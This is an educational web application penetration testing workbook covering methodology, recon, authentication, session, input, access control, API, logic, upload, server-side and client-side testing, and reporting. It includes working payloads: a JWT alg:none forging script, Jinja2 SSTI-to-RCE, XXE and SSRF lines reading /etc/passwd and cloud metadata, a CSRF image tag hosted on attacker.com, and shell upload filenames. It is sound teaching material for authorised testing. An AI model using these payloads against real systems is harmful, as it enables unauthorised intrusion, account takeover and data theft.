Chapter 1 β Web Pentest Methodology
Professional web application testing follows a structured methodology. Rushing to exploitation without proper reconnaissance leads to missed vulnerabilities.
# The web pentest phases:
1. Scoping β define what's in/out of scope, get written authorisation
2. Recon β passive info gathering (OSINT, DNS, tech stack)
3. Mapping β spider the application, discover all endpoints
4. Testing β test each area systematically (OWASP methodology)
5. Exploitation β exploit confirmed vulnerabilities (with care)
6. Post-Exploit β assess impact, pivot if authorised
7. Reporting β document findings with CVSS scores and remediation
# Essential tool setup
Burp Suite β the core tool (intercept, repeat, intruder, scanner)
Firefox β configured to proxy through Burp (127.0.0.1:8080)
FoxyProxy β browser extension to easily toggle proxy on/off
Chapter 2 β Recon & Application Mapping
# Passive recon β never touching the target
whois target.com
dig target.com ANY
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | sort -u
theHarvester -d target.com -b all
# Active recon β crawling the application
# In Burp: Spider the site
Target β Site Map β right-click target β Spider this host
# Directory bruteforce
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,js
# Technology fingerprinting
whatweb https://target.com
curl -I https://target.com # check Server, X-Powered-By headers
# JavaScript file analysis β often contains endpoints, API keys
# In Burp: Target β Site Map β filter by .js
# Or use: linkfinder.py -i https://target.com -d
Chapter 3 β Authentication Testing
# Test for weak credentials
admin:admin, admin:password, admin:123456, test:test
# Username enumeration
# Different error messages for valid vs invalid usernames?
# "User not found" vs "Incorrect password" β enumerates users!
# Brute-force with Burp Intruder
# Intercept login β Send to Intruder
# Position: mark password field as Β§passwordΒ§
# Payload: load wordlist
# Start attack β sort by length (different response = hit)
# Password reset vulnerabilities
# Predictable reset tokens? (time-based, sequential, short)
# Token reuse? (can old tokens still work?)
# Host header injection? (reset link goes to wrong domain)
# Multi-factor authentication bypass
# Skip the MFA step entirely (direct URL navigation)?
# Response manipulation (change 2FA "invalid" to "valid")?
# Brute-force 4-6 digit codes (no rate limiting)?
Chapter 4 β Session Management
# Analyse session tokens in Burp Sequencer
# Intruder β Sequencer β select cookie β Start live capture
# Burp analyses randomness β low entropy = predictable tokens
# Cookie security flags
# Check for missing flags:
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict
# Missing HttpOnly β XSS can steal the cookie
# Missing Secure β sent over HTTP (MITM risk)
# Missing SameSite β CSRF vulnerability
# JWT token testing
# Decode at jwt.io β check algorithm
# "alg": "none" attack β remove signature, change claims
# Check for JWT "alg:none" vulnerability
# Original JWT: header.payload.signature
# Modified: header_none.modified_payload. (empty signature)
python3 -c "
import base64, json
header = base64.urlsafe_b64encode(json.dumps({'alg':'none','typ':'JWT'}).encode()).rstrip(b'=')
payload = base64.urlsafe_b64encode(json.dumps({'user':'admin','role':'admin'}).encode()).rstrip(b'=')
print(f'{header.decode()}.{payload.decode()}.')
"
Chapter 5 β Input Validation Vulnerabilities
# Test EVERY input field with:
' β SQLi test
<script>alert(1)</script> β XSS test
../../../etc/passwd β Path traversal
; id β Command injection
${7*7} β SSTI (Server Side Template Injection)
# SSTI β Server Side Template Injection
# If ${7*7} returns 49 in the output β SSTI confirmed!
# Jinja2 (Python): {{7*7}} β 49
# Twig (PHP): {{7*7}} β 49
# FreeMarker: ${7*7} β 49
# SSTI β RCE in Jinja2
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# XXE β XML External Entity
# If the app accepts XML input:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>
Chapter 6 β Access Control (IDOR, Privilege Escalation)
# IDOR β Insecure Direct Object Reference
# Change IDs in URLs/parameters to access others' data
GET /api/user/1001/profile β /api/user/1002/profile
GET /download?file=invoice_1001.pdf β file=invoice_1002.pdf
# Horizontal vs Vertical privilege escalation
# Horizontal: access other USERS' data (same privilege level)
# Vertical: access ADMIN functionality from a normal user account
# Test for vertical privesc
# Browse to admin URLs while logged in as normal user:
/admin, /admin/panel, /dashboard/admin, /management
# Parameter pollution
# POST /changepassword
# user_id=victim_id&user_id=attacker_id β which one does the server use?
# Forced browsing
# Remove authentication (delete cookie) and try to access protected pages
# Does the app redirect? Or just load anyway?
Chapter 7 β API Testing
# Find API documentation
/api/docs, /swagger, /api/swagger.json, /openapi.json
/v1/api, /v2/api (look for versioning)
# Common API vulnerabilities:
Broken Object Level Auth (BOLA) β IDOR in APIs (change user_id)
Mass Assignment β send extra JSON fields ({"role":"admin"})
Lack of Rate Limiting β brute-force passwords/OTPs
Excessive Data Exposure β API returns more data than needed
Improper Auth β endpoints work without auth token
# Test with curl
curl -H "Authorization: Bearer TOKEN" https://api.target.com/v1/users
curl -X POST -H "Content-Type: application/json" \
-d '{"username":"admin","role":"admin"}' \
https://api.target.com/v1/register
Chapter 8 β Business Logic Flaws
# Business logic flaws are unique to each application
# They require understanding WHAT the app is supposed to do
# Common examples:
Price manipulation:
β Change price in request: price=0.01 instead of 99.99
β Apply coupon codes multiple times
β Negative quantities (get money back)
Workflow bypass:
β Skip payment step and go directly to order confirmation
β Complete step 3 without doing step 2
Race conditions:
β Transfer $100 twice simultaneously to double-spend
β Redeem a coupon multiple times with parallel requests
Account takeover:
β Register email with variations: admin@target.com vs admin+test@target.com
β Case sensitivity: Admin@target.com vs admin@target.com
Chapter 9 β File & Upload Vulnerabilities
# See the dedicated lab: labs/file-upload.html
# Key tests for any upload feature:
# 1. What extensions are allowed?
# Upload: .php, .php5, .phtml, .php.jpg, .aspx
# 2. What directory is the upload saved to?
# Check HTTP response, check JavaScript, check filename in HTML
# 3. Can you read back the uploaded file?
# Navigate to the upload path and see if it's web-accessible
# 4. Path traversal in filename
# Filename: ../../../../var/www/html/shell.php
# The file might be saved outside the intended directory
Chapter 10 β Server-Side Attacks
# SSRF β Server Side Request Forgery
# App fetches a URL for you β redirect it to internal services
?url=http://localhost/admin
?url=http://169.254.169.254/latest/meta-data/ β AWS metadata
?url=file:///etc/passwd
# Blind SSRF β no output visible
# Use Burp Collaborator or interactsh for OOB detection:
?url=http://your-collaborator-url.oastify.com
# Deserialization attacks
# Serialized objects in cookies/params β modify them for RCE
# Java: ysoserial
# PHP: phpggc
# Python: marshal, pickle
# Template Injection (SSTI) β RCE
# Test: {{7*7}}, ${7*7}, #{7*7}, *{7*7}
# If 49 appears β SSTI confirmed β escalate to RCE
Chapter 11 β Client-Side Attacks
# XSS β Cookie theft, phishing, keyloggers (see XSS lab)
# CSRF β Cross-Site Request Forgery
# CSRF: trick a victim into making requests on your behalf
<!-- Hosted on attacker.com -->
<img src="https://target.com/transfer?to=attacker&amount=1000">
<!-- When victim visits attacker.com while logged into target.com,
their browser silently makes this request with their cookies -->
# Test for missing CSRF tokens
# 1. Intercept a state-changing request (password change, email change)
# 2. Is there a CSRF token in the request?
# 3. If yes: can you remove it or reuse an old one?
# 4. Does the app check the Origin/Referer header?
# Clickjacking β embed target site in iframe to trick clicks
# Check for X-Frame-Options header:
# Missing β site is clickjackable
curl -I https://target.com | grep -i "x-frame"
Chapter 12 β Writing a Web Pentest Report
# Report structure:
1. Executive Summary (non-technical β for management)
β Tested: target.com (June 2025)
β Found: 2 Critical, 3 High, 5 Medium vulnerabilities
β Overall risk: HIGH
2. Scope & Methodology
β What was tested, dates, tools used, exclusions
3. Findings (one section per vulnerability)
β Name: SQL Injection in login form
β CVSS Score: 9.8 Critical
β Description: What the vulnerability is
β Evidence: Screenshot + request/response from Burp
β Impact: An attacker can dump the entire database
β Remediation: Use parameterised queries / prepared statements
4. Remediation Summary Table
β ID, Vulnerability, Severity, Status
5. Appendix
β Full tool output, all URLs tested
# CVSS Severity levels:
9.0-10.0 β Critical
7.0-8.9 β High
4.0-6.9 β Medium
0.1-3.9 β Low
Workbook Complete! You now have a full web app pentest methodology. Practice on DVWA, WebGoat, and HackTheBox Web challenges. For certification, look at eWPT (web pentesting) from eLearnSecurity.